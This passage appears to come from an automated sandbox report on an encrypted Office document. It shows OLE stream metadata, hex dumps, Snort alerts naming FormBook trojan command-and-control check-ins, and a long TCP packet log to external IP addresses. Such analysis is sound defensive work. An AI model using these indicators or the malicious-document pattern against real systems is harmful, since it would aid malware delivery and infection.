                                                                                                                                                  Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                  Stream Path: EncryptedPackage, File Type: data, Stream Size: 1263144
                                                                                                                                                  General
                                                                                                                                                  Stream Path:EncryptedPackage
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:1263144
                                                                                                                                                  Entropy:7.99876353791
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:. F . . . . . . ! 4 , t . . . . w . . . T . / . l / F s . . ? . . . . G . Q . # . . + . 3 _ & . . 7 ^ . , . . . . \\ Q . . . . . . D . . / | . . . . . . . f . . D . J . . . . r . . . . . f . . D . J . . . . r . . . . . f . . D . J . . . . r . . . . . f . . D . J . . . . r . . . . . f . . D . J . . . . r . . . . . f . . D . J . . . . r . . . . . f . . D . J . . . . r . . . . . f . . D . J . . . . r . . . . . f . . D . J . . . . r . . . . . f . . D . J . . . . r . . . . . f . . D . J . . . . r . . . . . f . .
                                                                                                                                                  Data Raw:18 46 13 00 00 00 00 00 21 34 2c 74 f0 df 0f b2 77 dc 9f 8a 54 c0 2f 9a 6c 2f 46 73 b2 a2 3f bc 9b b8 a1 47 85 51 d6 23 04 9a 2b b7 33 5f 26 be 1d 37 5e b5 2c fe a2 c9 09 5c 51 b8 15 0d c5 d2 8f 44 f4 f4 2f 7c 00 80 8c d3 a4 dd c7 66 dc cd 44 d5 4a b4 c3 c4 e2 72 8c d3 a4 dd c7 66 dc cd 44 d5 4a b4 c3 c4 e2 72 8c d3 a4 dd c7 66 dc cd 44 d5 4a b4 c3 c4 e2 72 8c d3 a4 dd c7 66 dc cd
                                                                                                                                                  Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                  General
                                                                                                                                                  Stream Path:EncryptionInfo
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:224
                                                                                                                                                  Entropy:4.62639518968
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . = . . . . . . . % ] . . . . . C . N . . . . w . . . _ . . . . . . . . ) . ? [ k . . p . . . . W . . . . . P . . . X . . . . . . v . .
                                                                                                                                                  Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                  Network Behavior

                                                                                                                                                  Snort IDS Alerts

                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                  07/22/21-17:16:43.686728TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.22151.101.0.119
                                                                                                                                                  07/22/21-17:16:43.686728TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.22151.101.0.119
                                                                                                                                                  07/22/21-17:16:43.686728TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.22151.101.0.119
                                                                                                                                                  07/22/21-17:16:51.093327ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jul 22, 2021 17:15:02.746526003 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.789097071 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.789216042 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.789858103 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.833070993 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.833103895 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.833125114 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.833147049 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.833396912 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.876674891 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.876698971 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.876715899 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.876730919 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.876743078 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.876748085 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.876764059 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.876782894 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.876785994 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.876800060 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.876806974 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.876828909 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920212030 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920245886 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920284033 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920306921 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920308113 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920324087 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920327902 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920336008 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920341969 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920362949 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920372009 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920388937 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920408010 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920408010 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920432091 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920454979 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920476913 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920480967 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920484066 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920488119 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920490980 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920506954 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920514107 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920535088 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920537949 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920561075 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920564890 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920586109 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920594931 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920612097 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920625925 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920636892 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.921998024 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.963999033 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964061022 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964101076 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964103937 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964144945 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964188099 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964200020 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964207888 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964229107 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964265108 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964304924 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964306116 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964318991 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964330912 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964343071 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964344025 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964381933 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964411020 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964425087 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964443922 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964449883 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964452982 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964483023 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964484930 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964512110 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964534998 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964536905 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964549065 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964562893 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964571953 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964589119 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964596987 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964612961 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964621067 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964638948 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964648962 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964664936 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964673042 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964695930 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964699984 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964724064 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964729071 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964750051 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964759111 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964776039 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964783907 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964802027 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964802980 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964811087 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964827061 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964837074 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964854002 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964863062 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964879990 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964889050 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964911938 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964911938 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964940071 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964958906 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964971066 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.965008974 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.965020895 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.965032101 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.965138912 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.969577074 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.008585930 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.008644104 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.008671045 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.008697987 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.008698940 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.008758068 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.008784056 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.008800030 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.008838892 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.008848906 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.008861065 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.008874893 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.008886099 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.008903027 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.008915901 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.008936882 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.008945942 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.008965015 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.008980989 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.008997917 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009010077 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009028912 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009041071 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009068012 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009068966 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009107113 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009110928 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009145021 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009149075 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009186029 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009191990 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009221077 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009232044 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009251118 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009275913 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009284973 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009301901 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009329081 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009352922 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009366035 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009371042 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009373903 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009377956 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009390116 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009393930 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009403944 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009427071 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009434938 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009449005 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009464025 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009474993 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009489059 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009510040 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009515047 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009532928 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009540081 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009553909 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009572029 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009593010 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009597063 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009615898 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009622097 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009634972 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009654045 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009665966 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009680986 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009699106 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009706020 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009725094 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009732008 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009759903 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009768963 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009784937 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009788990 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.009804964 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.009840965 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.010831118 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.012065887 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.012094021 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.012113094 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.012131929 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.012146950 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.012164116 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.012166977 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.012182951 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.012187958 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.012187958 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.012191057 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.012192965 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.012206078 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.012207985 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.012227058 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.012247086 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.012249947 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.012290001 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.012295008 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.012378931 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.016226053 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.053479910 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.053518057 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.053535938 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.053556919 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.053592920 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.053616047 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.053638935 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.053647041 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.053661108 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.053666115 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.053669930 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.053673029 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.053683996 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.053702116 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.053705931 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.053730011 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.053749084 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.053770065 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.053771973 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.053792000 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.053811073 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.053813934 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.053816080 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.053833008 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.053837061 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.053837061 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.053841114 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.053858042 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.053859949 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.053879976 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.053879976 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.053900003 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.053901911 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.053922892 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.053924084 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.053951979 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.053956032 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.054918051 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.054951906 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.054974079 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.054976940 CEST4916580192.168.2.223.121.113.175
